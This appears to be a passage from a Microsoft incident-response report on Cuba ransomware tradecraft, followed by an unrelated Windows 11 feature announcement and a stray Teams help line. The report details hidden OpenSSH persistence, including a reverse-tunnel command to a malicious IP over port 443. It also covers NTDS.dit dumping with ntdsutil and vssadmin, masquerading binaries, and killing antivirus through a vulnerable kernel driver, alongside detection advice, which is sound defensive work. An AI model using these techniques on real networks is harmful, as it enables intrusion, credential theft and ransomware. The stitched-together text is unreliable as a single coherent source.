The actor installed OpenSSH on the client’s network to maintain persistence on critical servers, including domain controllers and domain administrator workstations. The actor installed OpenSSH within C:\Windows\OpenSSH, rather than the standard OpenSSH path in System32.
The actor created a scheduled task for a persistent SSH connection to their C2 as “NT AUTHORITY\System”. The actor used TCP 443 for their SSH traffic rather than the standard TCP 22. In many organizations, TCP 22 outbound may be blocked, but as TCP 443 is needed for web traffic the port is often open. The actor also enabled port forwarding on TCP 7878 to allow the tunneling of malicious tools through the SSH connection.
The actor was also observed renaming ssh.exe to “C:\Windows\OpenSSH\svchost.exe” in a likely attempt to evade detection.
Figure 4. Example of the process masquerading to hide SSH usage
Four days after the actor deployed the ransomware, the actor returned to the compromised network through their existing OpenSSH persistence to install further persistence SSH services on additional domain controllers and domain administrator workstations.
The actor used OpenSSH’s sftp-server to transfer files between their C2 and the compromised host. The actor generated SSH keys on compromised hosts using ssh-keygen.exe, a tool apart of the OpenSSH tool suite. This allowed the actor to SSH using the keys rather than credentials, after credentials had been reset.
Lateral movement
Impacket (WMI)
Impacket’s WMI modules were used throughout the early stages of the compromise for remote execution and discovery. Impacket is an open-source collection of scripts for working with network protocols. This toolkit has recently been used by a large variety of crimeware groups for lateral movement and network discovery.
The actor used Impacket to execute PowerShell scripts out of “C:\Perflogs\”, which created .txt files within the same directory. All commands executed through Impacket output the results of the command to “\\127.0.0.1\ADMIN$\__1648051380.61”. The actor then deleted the PowerShell scripts and text files after execution.
Figure 5. Sample Impacket query with results being output into a file within the ADMIN$ directory
The actor also used Impacket to test if the destination server was able to ping the actor’s C2 before deploying Cobalt Strike to the device.
Figure 6. Actor testing the connectivity to their C2 through Impacket
PsExec
The actor used PsExec.exe to spread the ransomware on the victims’ network. The actor first executed “open.bat”, which executed “net share [C-Z]=[C-Z]:\ /grant:everyone,FULL”. This shared every drive on the host, granting access to everyone. “A.exe”, “Anet.exe”, and “Aus.exe” are all variants of the Cuba ransomware.
Figure 7. Command lines the actor executed through PsExec
Remote desktop protocol
While the attacker had access to lateral movement and remote code execution via Impacket and PsExec, the main method they used for lateral movement in this incident was Remote Desktop Protocol (RDP), which allowed them to use a GUI environment to change system settings and install malware. The actor used domain administrator accounts to RDP between devices.
Credential access
WDigest
The actor abused WDigest to cache credentials early in the compromise. This enabled the actor to gain access to domain administrator credentials.
WDigest is a Windows feature that when enabled, caches credentials in clear text. This is often abused by credential access tools, such as Mimikatz. To detect if WDigest has been enabled within your network, the registry key HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential will be set to 1. This can be disabled by setting the value to 0.
Figure 8. Example of the actor enabling WDigest
NTDSUtil Dumping
The actor obtained the Active Directory database (NTDS.dit) twice. On the first instance, the actor obtained the NTDS.dit five months into the compromise. Four days after the deployment of ransomware, the actor obtained the NTDS.dit a second time. The actor was able to create a copy of the NTDS.dit through the usage of the native tool ntdsutil.exe, copying the .dit to “C:\Windows\Temp\data\audit\Active Directory\ntds.dit”.
Figure 9. Actor command to obtain ntds.dit
Volume shadow copy access
The actor used a second method to obtain the Active Directory database, they used “vssadmin” to create a volume shadow copy of a domain controller. This technique creates a static copy of system files that a user would not typically be able to access. Once the volume shadow copy was created, the actor copied the NTDS.dit, SYSTEM hive and SECURITY hive to C:\Windows\, where they could then remotely copy through the ADMIN$ share.
Figure 10. Actor commands to create Volume Shadow Copy and copy the ntds.dit
Exfiltration
Compression
The actor was observed using 7-Zip to compress files before exfiltration. 7z.exe was executed out of C:\Windows\Temp. The actor did not include a password for the archive and used the device hostname as the name of the archive (for example: DC01.7z).
PSCP
The actor used PuTTY Secure Copy (PSCP) to remotely exfiltrate network shares to an actor controlled C2. This version of PSCP had been renamed to “lsas.exe” in an attempt to masquerade itself as the legitimate “lsass.exe” service. PSCP was executed out of C:\Windows\Temp. The actor targeted Staff and Financial related resources.
Figure 11. Masqueraded PSCP to exfiltrate files
Defense evasion
Disabling antivirus
The actor disabled Microsoft Defender Antivirus on multiple devices after files had been quarantined by the antivirus. The actor turned off Microsoft Defender Antivirus through the Windows Security GUI application while connected via RDP to the device.
Figure 12. Microsoft Defender for Endpoint alert from the actor disabling real-time monitoring
Kernel driver
The actor used an Avast anti-rootkit driver. Unit 42 recently released a blog on how Cuba ransomware groups have used this driver to disable antivirus software before deploying the Cuba ransomware.
The actor installed the driver using the “sc” command, enabling kernel-level permissions. The actor then started the service with “sc start aswSP-ArPot2”. This service was used by the actor to disable the victims’ antivirus products through Kernel privileges. Antivirus products being disabled within the victim network ensured that their ransomware would spread without the malware being quarantined or prevented.
Figure 13. Vulnerable driver being installed
The actor also created benign binaries to trigger the driver vulnerability. These binaries would iterate through a list of common antivirus executable names, providing each one to the control code 0x9988C094 and subsequently tasking the driver to kill those processes.
Discovery
The actor was observed executing generic system enumeration commands. While these commands are not malicious, when seen together, it can often indicate an unauthorized user is enumerating the system.
The actor was seen executing the following commands:
As we observe more attacks using similar methods as described in this blog, organizations must ensure they follow security practices to defend their servers. The following is a list of recommendations for monitoring that organizations should implement as part of their detection strategy.
Service creation
Service creation events should be monitored for anomalous events. A high priority alert should be placed on administrator accounts creating services that execute as System. This is a common privilege escalation technique that can be utilized in a variety of methods, including having the service.
Execute a malicious binary directly,
Write to an actor controlled Named Pipe, allowing the actor to steal an impersonation token,
Executing a DLL through rundll32.exe
Figure 14. Instance of rundll32.exe execute Cobalt Strike with System integrity level
New service creations should be monitored for anomalous paths or executables. High priority alerts should be made for drivers located within those anomalous paths. While the driver was legitimately signed, the location can be a sign of malicious use. Examples of anomalous paths include but are not limited to:
C:\Temp\
C:\ProgramData\
C:\Windows\
C:\Windows\Temp\
Use of SSH
Microsoft recommends monitoring for unauthorized installations and usage of SSH in your network. SSH should not run as “NT AUTHORITY\System”.
In this incident, the actor used the following SSH command lines. Similar activity should be monitored within your environment:
ssh <organization>@<malicious IP address> -p 443 -i C:\ProgramData\ssh\id_ed25519 -R <malicious IP address>:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes -o StrictHostKeyChecking=no
The actor attempted to masquerade the SSH process as “svchost.exe”, so monitoring for the command on other process names may indicate process masquerading.
Copying to remote share
Microsoft recommends monitoring for the command prompt accessing remote shares. This was a common technique used by the actor for transferring files throughout the network.
Figure 15. The actor copying Cobalt Strike via SMB
Microsoft Defender for Endpoint will create an alert when the command prompt accesses remote shares. This includes the Impacket usage where the command targets the localhost ADMIN$ share. Monitoring these alerts within your network can help detect unauthorized access.
Figure 16. Sample alert in Defender for Endpoint when a command prompt accesses a remote share
PsExec
Networks should monitor for unauthorized usage of PsExec. Suggested detection techniques include:
Existence or execution of the binary: PsExec.exe
Existence or execution of the service binary: PsExeSvc.exe
Service creation named PsExeSvc
Named Pipes created with the name PsExeSvc
The techniques that PsExec uses can easily be replicated, either through living-off-the-land tools or through a custom toolset using the Windows API. Monitoring for each stage of PsExec can help detect unauthorized variants within your network. PsExec works in three stages:
SMB connection to ADMIN$ on the destination device, copying the binary “PSEXESVC” to the Windows directory.
Remote connection to RPC (port 135) on the destination device, creating a service to execute the binary.
Create the named pipe \\.\pipe\PSEXESVC to remotely communicate between host and destination.
Figure 17. Diagram describing how PsExec works
Monitoring executable files being written to administrative shares may help detect attempts of lateral movement. This can include monitoring for native command lines, such as copy, targeting remote shares like what we mentioned above. Defender for Endpoint can be used to monitor file creation events via Server Message Block (SMB) through DeviceFileEvents. The executable file will be created by the ntoskrnl.exe process, which is the kernel process that manages SMB, and the ShareName column will be ADMIN$.
Figure 18. Example of PsExeSvc.exe being created via Server Message Block (SMB) in Defender for Endpoint
Anomalous remote connections to RPC (Port 135) should be monitored within the network, as this can be used by a process to remotely create and start a service. The summarize and sort operators within Defender for Endpoint’s Advanced Hunting can help detect uncommon connections on Port 135. The following KQL can help build a basis for identifying anomalous connections:
DeviceNetworkEvents
| where RemotePort == 135
| summarize count() by InitiatingProcessFileName
| sort by count_ asc
Figure 19. Image showing PsExec.exe connecting to a remote host on port 135
This technique can also be replicated through remote service creation using named pipes. An actor can remotely connect to the IPC$ share and open the named pipe svcctl to remotely create a service. This would contain similar detections, except the traffic will be over port 445 to the IPC$ share.
On the destination end, the RPC connection will result in the creation of a service. Monitoring for unauthorized service creation can be done through capturing the 4679 event in the System event log.
Figure 20. Service creation event in Defender for Endpoint
Remote named pipe communication can be monitored through the creation of the named pipe on the destination server. PsExeSvc.exe will create a named pipe called PSEXESVC, which the host device can connect to through the IPC$ share. As the host device connection is through SMB, the ntoskrnl.exe process will connect to the named pipe as a client.
Figure 21. Remote SMB named pipe communications for PsExec
NTDS.dit dumping
Monitor the usage of ntdsutil for malicious instances, where actors may attempt to obtain the NTDS.dit. The command in the NTDS.dit dumping section shows how the actor used this tool to create a copy of the NTDS.dit. This command can be monitored, with the path being the only variable that will change. There are limited legitimate reasons to create a full NTDS.dit copy.
Figure 22. Defender for Endpoint alert from ntds.dit dump
Defender for Endpoint alerts on the dumping of the NTDS.dit, and these alerts should be responded to with high priority. Monitoring for the unauthorized usage of the “ntdsutil” tool is strongly encouraged as well.
If your network has file monitoring enabled, alerting on the creation of new .dit files can also help detect potential NTDS.dit dumping. The actor was observed copying the NTDS.dit out of a volume shadow copy.
Figure 23. Example command copying NTDS.dit from a volume shadow copy
Antivirus tampering
Organizations should monitor and respond to antivirus and endpoint detection and response (EDR) alerts where antivirus has been disabled or tampered with. Wherever possible, anti-tampering settings should be enabled to prevent actors from being able to interact with and disable antivirus software. For more information about Defender for Endpoint tamper protection, visit our docs page: Protect security settings with tamper protection.
Microsoft Defender Antivirus provides event logging on attempted tampering of the product. This can include the disabling of services, such as Real Time Protection (Event ID: 5001). An alert will also be created within the Defender for Endpoint portal where customers have the ability to further triage the alert through the advanced hunting interface. Monitoring for the usage of the Windows PowerShell cmdlet can also help discover instances of anti-virus tampering.
Figure 24. Sample command to look for antivirus tampering
Remote desktop protocol
DART was able to detect actor RDP connections through anomalous connections. These anomalous connections include:
Domain administrators logging into multiple servers for the first time, and
Domain administrators initiating RDP connections from abnormal locations.
Domain and enterprise administrator logons should be audited for anomalous connections, including connections originating from edge servers or onto servers that they do not usually administrate. Multifactor authentication (MFA) should be enforced for administrator accounts.
Conclusion
Ransomware groups continue to grow in sophistication through the increasing hibernation times before encryption, large varieties of persistent access and the use of legitimate signed binaries. These groups continue to target sensitive data for exfiltration, with some groups returning to the network post-encryption to ensure they maintain a foothold on the network.
Networks must remain vigilant hunting for these TTPs and anomalous behaviors. The Cuba ransomware group used a large variety of living of the land techniques to help evade detection by antivirus products. This requires a stronger focus on anomaly and behavioral detections for hunting on a network, rather than standard malicious file detection. Software auditing of remote access tools and remote execution tools, such as PsExec and SSH, should be regularly evaluated.
Microsoft strongly recommends focusing on the following actions to help improve your network’s security posture:
Enabling tamper protection on antivirus products.
Triage high severity antivirus and EDR alerts within a timely manner, including tampering alerts.
Enable MFA and monitoring for administration accounts.
Monitoring anomalies in service and scheduled task creation.
To understand how Microsoft can help you secure your network and respond to network compromise, visit https://aka.ms/DART.
Today, we are excited to announce the availability of new features in Windows 11 along with some exciting new experiences to help you be your most productive and creative, while also having fun. Announced in September, these new features and experiences begin to be available today and are a continuation of our commitment and journey to deliver continuous innovation in Windows to inspire and empower you.
It’s been an energizing few weeks for Windows with the launch of the Windows 11 2022 Update in 190+ countries around the world and our announcement just last week of new Surface devices. At the event, the team enjoyed showing you how Windows 11 comes to life on the new devices enabling you to participate, be seen, heard and express your creativity. If you missed the event, you can watch it here.
Let’s jump into what’s new and available starting today.
Tabbed File Explorer1: One of our most loved and highly utilized features, File Explorer, is getting better. Windows is always looking for ways to simplify your everyday tasks and make collaborating as effortless as possible. So, we’re releasing Tabs to File Explorer that let you organize your files and switch between your folders with ease. The new Favorites section is the perfect place to pin your most used files. And thanks to the power of OneDrive we’re making it easier for you to see important information like which of your colleagues most recently edited or commented on your file. When sharing content, Windows can also provide a list of contacts you’re likely to share content with and some personalized suggestions based on your Microsoft 365 account. (Microsoft 365 subscription sold separately)
Suggested Actions1: Another way Windows is making your everyday tasks like collaborating with colleagues more efficient is by anticipating your needs and giving you suggestions for actions you may wish to take. For instance, when there are phone numbers or future dates in text, Windows highlights them, making it easy to click and call with Phone Link, Teams or Skype, or click to schedule an appointment, adding an event in your Calendar app and including the person you were communicating with on your invite.
Taskbar Overflow and easy access to Task Manager: Taskbar is getting two highly requested enhancements. First, if you like to pin a larger selection of apps to your taskbar than space allows, Taskbar gives you an entry point to an overflow menu that allows you to view all your overflowed apps in one space. Second, when you right click on the taskbar, in addition to Taskbar Settings, you will also see an option to jump directly into your Task Manager. These improvements have been made in direct response to your feedback and to give you access to what is important with a single click.
Share to more devices: To make sharing files even easier, we have enhanced the Windows Share experience so that you can simply share files with more discoverable devices nearby directly from your desktop, File Explorer, Photos, Snipping Tool, Xbox and other apps.
Photos app: Coming at the end of October, the Photos app on Windows 11 has been beautifully crafted to make organization of your photo collection easy, no matter where your photos come from — your phone, your camera, OneDrive — see them all together in one gorgeous gallery. We’re also delighted to deliver an exciting new Memories experience which resurfaces pictures you’ve saved on OneDrive, making revisiting life’s magical moments simple and effortless2. Enjoy picture compilations of recent highlights, time spent with loved ones, and more.
We also recently announced that the Photos app can now seamlessly access all the photos on your iPhone with direct connection to your iCloud photo library. Just install iCloud for Windows from the Microsoft Store and the photos you take with your iPhone will appear automatically in your Photos app. iCloud integration will be available in November.
Amazon Appstore: Through our partnership with Amazon, you can now access Android™ apps and games from the Amazon Appstore, generally available in 31 countries, including Australia, Canada, France, Germany, Italy, Japan, Spain, United Kingdom, United States and more. With over 50,000 titles to choose from, it’s easy to discover and download your favorite apps and games on your Windows device, such as Project Makeover, Evony: The King’s Return, Coin Master, Kindle, Audible, FlipaClip, Lutron and so many more3. Enabled by Windows Subsystem for Android™, developers now have even more ways to bring their apps and games to Windows – learn more here.
New sports and entertainment apps: For fans everywhere, we are excited to announce that the ESPN app is available in the Microsoft Store globally across 239 markets4. This app joins the growing entertainment catalog, including well-known brands such as Hulu, Netflix, Discord, Vudu, Tubi, Crunchyroll, TikTok, along with Disney+ and Amazon Prime Video for an expanded catalog of titles – making Windows your destination for the entertainment and sports you seek.
We are delighted to deliver on our promise to bring you brand new experiences into Windows 11. These new features and experiences will start to become available today in an optional non-security preview release and a phased rollout via our servicing technology and new apps via Microsoft Store updates5, ensuring you can take advantage of the latest Windows experiences as these new features are ready. The new features will be made broadly available to all editions of Windows 11, version 22H2 in the November 2022 security update release. Going forward we will continue to announce, document and deliver new features and experiences when they are ready (learn more).
If you haven’t moved to Windows 11 yet, now is the time. From Surface to our incredible OEM partners, there is a broad array of choice in Windows 11 PCs to meet your needs. You can learn more here.
Android is a Trademark of Google LLC.
1Timing of feature delivery varies by device. Feature availability may vary by market.
2Access to images stored on OneDrive is contingent on the associated Microsoft Account the device is signed in with.
The Help icon to the right of Never translate (language) allows you to provide feedback that will be used to improve language detection in Teams.
